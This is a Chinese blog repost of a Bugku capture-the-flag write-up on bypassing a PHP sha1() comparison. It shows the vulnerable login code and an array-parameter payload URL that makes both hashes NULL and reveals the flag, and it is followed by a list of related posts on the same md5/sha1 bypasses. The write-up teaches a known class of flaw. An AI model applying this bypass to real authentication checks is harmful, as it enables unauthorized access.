代码审计-sha()函数比较绕过

最新推荐文章于 2024-06-06 18:19:01 发布
最新推荐文章于 2024-06-06 18:19:01 发布
阅读量327 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/gaonuoqi/p/11407477.html
版权 
<?php
$flag = "flag";
if (isset($_GET['name']) and isset($_GET['password']))
{
var_dump($_GET['name']);
echo "
";
var_dump($_GET['password']);
var_dump(sha1($_GET['name']));
var_dump(sha1($_GET['password']));
if ($_GET['name'] == $_GET['password'])
echo '

Your password can not be your name!
';
else if (sha1($_GET['name']) === sha1($_GET['password']))
die('Flag: '.$flag);
else
echo '

Invalid password.
';
}
else
echo '

Login first!
';
?>

sha跟md5函数一样,可以用数组绕过

payload

http://123.206.87.240:9009/7.php?name[]=1&password[]=2

得到

 

array(1) { [0]=> string(1) "1" }
array(1) { [0]=> string(1) "2" } NULL NULL Flag: flag{bugku--daimasj-a2}

转载于:https://www.cnblogs.com/gaonuoqi/p/11407477.html

diemozao8175
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
审查代码规范(C++)
03-06
审查代码规范 C++ 1. 范围 3 2. 规范性引用文件 3 3. 术语和定义 3 4. 开发工具 3 5. 目录结构 4 6. 布局规范 5 6.1. 对齐 5 6.2. 代码行内的空格 7 6.3. 空行 8 6.4. 代码行 9 6.5. 长行拆分 10 6.6. 注释 11 6.6.1. 概述 11 6.6.2. 基本规则 11 6.6.3. 函数注释(序言性注释) 13 6.6.4. 程序注释(功能性注释) 15 7. 命名规则 17 7.1. 共性规则 17 7.2. 一般命名规则 17 8. 文件结构 19 8.1. 概述 19 8.2. 版权和版本的声明 19 8.3. 头文件的结构 20 8.4. 定义文件的结构 21 9. 注意事项 22 9.1. 布尔变量与零值比较 22 9.2. 整型变量与零值比较 23 9.3. 浮点变量与零值比较 23 9.4. 指针变量与零值比较 23 9.5. 第三方工具的使用 23 10. SQL代码规范 24 10.1. SQL语句格式 24 10.2. SQL性能优化 24 10.2.1. WHERE子句中的连接顺序 24 10.2.2. SELECT子句中避免使用“*” 24 10.2.3. 减少访问数据库的次数 24 10.2.4. 使用DECODE函数来减少处理时间 25 10.2.5. 用Where子句替换HAVING子句 26 10.2.6. 减少对表的查询 26 10.2.7. 使用表的别名(Alias) 27 10.2.8. 用EXISTS替代IN 27 10.2.9. 用索引提高效率 29 10.2.10. 避免在索引列上使用计算 31 10.2.11. 避免在索引列上使用IS NULL和IS NOT NULL 31 10.2.12. 使用UNION-ALL和UNION 32
HMAC-SHA256和HMAC-SHA1加密C语言代码
12-25
项目中的`sha256.c`和`sha1.c`文件包含了SHA256和SHA1的实现,而`HMACSHA.c`可能包含了HMAC的实现,利用了上述的两个哈希函数。`sha256.h`和`sha1.h`是对应的头文件,定义了相关函数的接口。`base64.c`和`base64.h`...
Bugku——sha()函数比较绕过
王嘟嘟的博客
11-01 1548
0x00 前言 有点静不下心,所以做做ctf的题目。 题目 0x01 Start &amp;lt;?php $flag = &quot;flag&quot;; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo &quot; &quot;; var_dump($_GET['password']); var_dump(sh
2024墨者杯sha1绕过
最新发布
weixin_50358335的博客
06-06 269
重点时第三次if,这里要求roam1和roam2不相等,又要求sha1相等。第一个if判断是否post访问,如果不是返回405。这里同样可以用md5数组的方式绕过
bugku sha()函数比较绕过
m0_52432374的博客
02-04 106
sha()函数比较绕过 <?php $flag = "flag"; if (isset($_GET['name']) and isset($_GET['password'])) { var_dump($_GET['name']); echo " "; var_dump($_GET['password']); var_dump(sha1($_GET['name'])); var_dump(sha1($_GET['password'])); if ($_GET['name'] == $_GET['pass
bugku学习之sha1绕过(前面过狗一句话是Md5绕过
s11show_163的博客
02-29 774
这个题要求get传递id的url解码之后值是margin,发现‘margin’进行url加密解密都是本身 并且要求get传递的uname和post传递的passwd值在进行sha1加密之后的值和类型都相等但是加密前的值又不能相等,这要怎么办呢? sha1加密数组的时候会无法处理导致sha1($_GET['uname'])和sha1($_POST['passwd'])的返回值都为null这就绕过...
【bugku】web29 (sha1绕过)
EC_Carrot的博客
12-23 334
<?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname']) and isset($_POST['passwd'])) { if ($_GET['uname'] == $_POST['passwd']) print 'passwd can not be unam
配置好的kafka_2.12-2.8.0 + SCRAM-SHA-256
12-02
在版本2.8.0中,它提供了一种安全的身份验证机制——SCRAM-SHA-256,这是用于用户认证的一种安全方法。在本文中,我们将深入探讨Kafka的配置、SCRAM-SHA-256的工作原理以及如何在Kafka集群中设置和使用它。 ### ...
散列函数hash-sha1
05-05
散列函数hash 基于SHA-1。MATLAB可运行实现。
hmac_sha256:C C ++中最少的HMAC-SHA256实现
04-23
该存储库提供了最少的HMAC-Sha256代码,您可以将其复制到自己的项目中。 hmac_sha256函数如下所示: size_t // Returns the number of bytes written to `out` hmac_sha256 ( // [in]: The key and its length. /...
C/C++实现HMAC-SHA1和base64编码
12-16
C语言版的实现HMAC-SHA1和base64编码,已经对C++做了兼容处理,在VS下运行main.c代码,可以得到经过HMAC-SHA1处理后的结果,并且可以运行里面的base64编码函数得到想要的结果,可以用于连接阿里云MQTT
bugku——sha()函数比较绕过
吃肉唐僧的博客
09-01 633
打开题目,题目提示sha()函数绕过 网上常见的poc 有 sha1('aaK1STfY')与sha1('aaO8zKZF') 发现并不能回显flag 后来看到===,于是构造数组 flag出来了
封神台-WEB-登录(考点:sha1函数绕过
CTF
02-07 425
打开容器后发现,根据提示先查看网页源代码,直接ctrl+u,发现里边是sha1的强相等绕过,第一种方法是用数组绕过(用于能允许数组绕过的方法),这道题直接数组绕过即可,第一种方法,第二种用于不能用数组绕过的方法,
MD5&sha1绕过
Luodehahajiang的博客
02-07 2542
md5绕过 sha1绕过 fastcoll
PHPsha1()函数和md5()函数绕过
weixin_46578840的博客
08-10 1674
PHPsha1()函数和md5()函数绕过 sha1函数和md5都是哈希编码的一种,在PHP中,这两种编码是存在绕过漏洞的。 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 只需要传入开头都是0E的两个值,便可成功绕过。 例如这个代码(sha1($_GET['uname']) === sha1($_POST['passwd'])
PHP—MD5和sha1绕过
cosmoslin的博客
10-26 7184
1 数组绕过 对于php比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 <?php $a=$_GET['a']; $b=$_GET['b']; if ($a!==$b && md5($a)===md5($b)){ return "hahaha"; } 使用: ?a[]=1&b[]=2 2 0e绕过比较 对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科
实验楼----PHP代码审计(sha1、md5)
weixin_30325971的博客
06-27 74
地址:http://www.shiyanbar.com/ctf/1787 题目: 分析: 如图,需要传递name和password,同时需要name和password不相等,到这里都很简单 然后需要(sha1($_GET['name']) === sha1($_GET['password']) 使用常规的用户名密码是无法完成的,这里有一点是sha1无法对数组进行处理, ...
代码审计
cnbird's blog
12-21 4719
代码审计
php安全特性学习(二)
Yale的博客
05-31 344
环境如图: 4.1 实验任务一 sha()比较绕过 代码 访问 sha1()函数默认的传入参数类型是字符串型,那要是给它传入数组则会出现错误,使sha1()函数返回false,这样一来=运算符就可以满足了,需要构造username和password不相等使之满足,又构造数组类型使得sha1()返回false满足===,因为a[]和b[]同样是数组类型 进制绕过 代码 访问 代码中的fo...
SHA-512函数的用法
03-01
1. 导入SHA-512库:在使用SHA-512函数之前,需要导入相应的库或模块,以便在代码中调用SHA-512函数。 2. 输入数据:将要进行哈希计算的数据作为输入传递给SHA-512函数。 3. 计算哈希值:调用SHA-512函数对输入数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值